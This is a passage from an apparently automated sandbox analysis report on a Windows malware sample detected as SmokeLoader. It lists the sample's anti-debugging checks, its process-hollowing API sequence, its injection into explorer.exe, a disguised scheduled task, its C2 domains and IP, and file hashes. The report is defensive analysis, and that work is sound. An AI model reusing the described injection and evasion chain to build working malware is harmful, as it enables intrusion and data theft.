                  Source: explorer.exe, 00000002.00000000.323608732.000000000F5F1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001^
                  Source: explorer.exe, 00000002.00000000.279146238.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                  Source: explorer.exe, 00000002.00000000.318036977.0000000008251000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040DAC5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040DAD4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412320 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00412320
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E0042 push dword ptr fs:[00000030h]0_2_008E0042
                  Source: C:\Users\user\AppData\Roaming\rudwaguCode function: 10_2_00729596 push dword ptr fs:[00000030h]10_2_00729596
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C824 SetUnhandledExceptionFilter,0_2_0040C824
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411135 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00411135
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040DAC5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040973F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040973F

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: rudwagu.2.drJump to dropped file
                  Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                  Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_008E0110
                  Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 4EC1930Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguThread created: unknown EIP: 2B11930Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\rudwaguProcess created: C:\Users\user\AppData\Roaming\rudwagu C:\Users\user\AppData\Roaming\rudwaguJump to behavior
                  Source: explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.260169112.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300570546.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
                  Source: explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.273784795.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.341545832.000000000833A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.299803671.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.329320639.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.330057159.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.260169112.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.300570546.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004134ED
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CBB2 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040CBB2

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.rudwagu.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rudwagu.6e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.8e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.rudwagu.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.rudwagu.6e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.0.rudwagu.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.8e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  512
                  Process Injection
                  11
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Native API
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  12
                  Virtualization/Sandbox Evasion
                  LSASS Memory331
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                  Non-Application Layer Protocol
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)512
                  Process Injection
                  Security Account Manager12
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                  Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information
                  NTDS3
                  Process Discovery
                  Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Hidden Files and Directories
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common2
                  Obfuscated Files or Information
                  Cached Domain Credentials14
                  System Information Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Software Packing
                  DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading
                  Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  File Deletion
                  /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 764039 Sample: file.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus detection for URL or domain 2->32 34 Yara detected SmokeLoader 2->34 36 3 other signatures 2->36 7 file.exe 2->7         started        10 rudwagu 2->10         started        process3 signatures4 46 Contains functionality to inject code into remote processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 file.exe 7->12         started        50 Machine Learning detection for dropped file 10->50 15 rudwagu 10->15         started        process5 signatures6 52 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Checks if the current machine is a virtual machine (disk enumeration) 12->56 17 explorer.exe 2 12->17 injected 58 Creates a thread in another existing process (thread injection) 15->58 process7 dnsIp8 26 host-file-host6.com 84.21.172.159, 49718, 80 COMBAHTONcombahtonGmbHDE Germany 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\rudwagu, PE32 17->22 dropped 24 C:\Users\user\...\rudwagu:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\rudwagu100%Joe Sandbox ML
                  SourceDetectionScannerLabelLinkDownload
                  1.0.file.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.rudwagu.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.rudwagu.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.rudwagu.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  11.0.rudwagu.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  10.2.rudwagu.6e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.2.rudwagu.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  1.0.file.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  1.0.file.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.rudwagu.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.rudwagu.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  0.2.file.exe.8e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  11.0.rudwagu.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://host-file-host6.com/0%URL Reputationsafe
                  http://host-host-file8.com/100%URL Reputationmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  host-file-host6.com
                  84.21.172.159
                  truetrue
                    unknown
                    host-host-file8.com
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://host-file-host6.com/true
                      • URL Reputation: safe
                      unknown
                      http://host-host-file8.com/true
                      • URL Reputation: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.299803671.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.329320639.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.259861471.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        84.21.172.159
                        host-file-host6.comGermany
                        30823COMBAHTONcombahtonGmbHDEtrue
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:764039
                        Start date and time:2022-12-09 10:55:09 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 46s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:file.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@6/2@4/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 91% (good quality ratio 83.5%)
                        • Quality average: 71.6%
                        • Quality standard deviation: 31.8%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 22
                        • Number of non-executed functions: 17
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, cdn.onenote.net
                        • Not all processes where analyzed, report is missing behavior information
                        TimeTypeDescription
                        10:57:01Task SchedulerRun new task: Firefox Default Browser Agent 635557CDEDEC7374 path: C:\Users\user\AppData\Roaming\rudwagu
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        84.21.172.159file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        PlW1EFIbvc.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        wlKbhd5bsS.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        file.exeGet hashmaliciousBrowse
                        • host-file-host6.com/
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        host-file-host6.comfile.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        PlW1EFIbvc.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        wlKbhd5bsS.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        COMBAHTONcombahtonGmbHDEfile.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        https://2gfnm.app.link/xHXJIVVbuvbGet hashmaliciousBrowse
                        • 84.21.172.16
                        PlW1EFIbvc.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        https://odggj.app.link/N51hIhDqzvbGet hashmaliciousBrowse
                        • 84.21.172.16
                        wlKbhd5bsS.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        TBN - SUPRAMAX PDA.PDF.jsGet hashmaliciousBrowse
                        • 84.21.172.33
                        181A0E4AA241E1BF7DA338760918724D3D1FB8FE828F2.exeGet hashmaliciousBrowse
                        • 160.20.145.136
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        https://pshoe.app.link/BsaHBSekuvbGet hashmaliciousBrowse
                        • 84.21.172.16
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        file.exeGet hashmaliciousBrowse
                        • 84.21.172.159
                        No context
                        No context
                        Process:C:\Windows\explorer.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):391680
                        Entropy (8bit):5.905176085960016
                        Encrypted:false
                        SSDEEP:6144:rc/EL7Tgx5oWtxKD82s8hh6K9W9Ix5nKded89kTR:rXHTgvz/2TIK9W9Ix5nLaw
                        MD5:0D810E582A95DEBFF5E1A72A76C602C9
                        SHA1:486A963C02B9E7D5ECC2941C4DCB7F589954D7D7
                        SHA-256:C57CAFEDD2E4617E24315CDE0DE7A6393610FB924E8BD4D3561EE3C4B2D90372
                        SHA-512:FA74B3FBE4C9EEE7CF9FA8C27760E8315693380683A29BABEF33B30F6AD1FEAB670C6E2ABE92B5E0CBF9D44598C5ACD571A5C885D6DB7CA37C8947A01068D4E7
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......b.................n...........p............@..........................`......Z........................................s..<............................@......................................0I..@............................................text...Vm.......n.................. ..`.data................r..............@....lokeris.....p.......&..............@..@.zoyan..p............2..............@..@.rsrc................6..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\explorer.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):5.905176085960016
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:391680
                        MD5:0d810e582a95debff5e1a72a76c602c9
                        SHA1:486a963c02b9e7d5ecc2941c4dcb7f589954d7d7
                        SHA256:c57cafedd2e4617e24315cde0de7a6393610fb924e8bd4d3561ee3c4b2d90372
                        SHA512:fa74b3fbe4c9eee7cf9fa8c27760e8315693380683a29babef33b30f6ad1feab670c6e2abe92b5e0cbf9d44598c5acd571a5c885d6db7ca37c8947a01068d4e7
                        SSDEEP:6144:rc/EL7Tgx5oWtxKD82s8hh6K9W9Ix5nKded89kTR:rXHTgvz/2TIK9W9Ix5nLaw
                        TLSH:0384CF013195C8F2C7A20D774816CBF1EA3BB42BFB249927F7583B5F6EF22914562A05
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......b.................n.
                        Icon Hash:8286dccea68c9c84
                        Entrypoint:0x407096
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x622EE3A4 [Mon Mar 14 06:41:40 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:eeffe9860bc9c6507e24465b9b5239be
                        Instruction
                        call 00007F3448BA22FCh
                        jmp 00007F3448B9C65Eh
                        mov edi, edi
                        push ebp
                        mov ebp, esp
                        sub esp, 28h
                        xor eax, eax
                        push ebx
                        mov ebx, dword ptr [ebp+0Ch]
                        push esi
                        mov esi, dword ptr [ebp+10h]
                        push edi
                        mov edi, dword ptr [ebp+08h]
                        mov byte ptr [ebp-08h], al
                        mov byte ptr [ebp-07h], al
                        mov byte ptr [ebp-06h], al
                        mov byte ptr [ebp-05h], al
                        mov byte ptr [ebp-04h], al
                        mov byte ptr [ebp-03h], al
                        mov byte ptr [ebp-02h], al
                        mov byte ptr [ebp-01h], al
                        cmp dword ptr [004432C4h], eax
                        je 00007F3448B9C7F0h
                        push dword ptr [00446268h]
                        call 00007F3448BA1228h
                        pop ecx
                        jmp 00007F3448B9C7E7h
                        mov eax, 0040CC48h
                        mov ecx, dword ptr [ebp+14h]
                        mov edx, 000000A6h
                        cmp ecx, edx
                        jg 00007F3448B9C95Ah
                        je 00007F3448B9C941h
                        cmp ecx, 19h
                        jg 00007F3448B9C8DEh
                        je 00007F3448B9C8CFh
                        mov edx, ecx
                        push 00000002h
                        pop ecx
                        sub edx, ecx
                        je 00007F3448B9C8B3h
                        dec edx
                        je 00007F3448B9C8A3h
                        sub edx, 05h
                        je 00007F3448B9C88Bh
                        dec edx
                        je 00007F3448B9C86Ch
                        sub edx, 05h
                        je 00007F3448B9C853h
                        dec edx
                        je 00007F3448B9C827h
                        sub edx, 09h
                        jne 00007F3448B9C9BAh
                        mov dword ptr [ebp-28h], 00000003h
                        mov dword ptr [ebp-24h], 00401348h
                        fld qword ptr [edi]
                        lea ecx, dword ptr [ebp-28h]
                        fstp qword ptr [ebp-20h]
                        push ecx
                        fld qword ptr [ebx]
                        fstp qword ptr [ebp+00h]
                        Programming Language:
                        • [C++] VS2008 build 21022
                        • [ASM] VS2008 build 21022
                        • [ C ] VS2008 build 21022
                        • [IMP] VS2005 build 50727
                        • [RES] VS2008 build 21022
                        • [LNK] VS2008 build 21022
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x173c40x3c.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x1a510.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
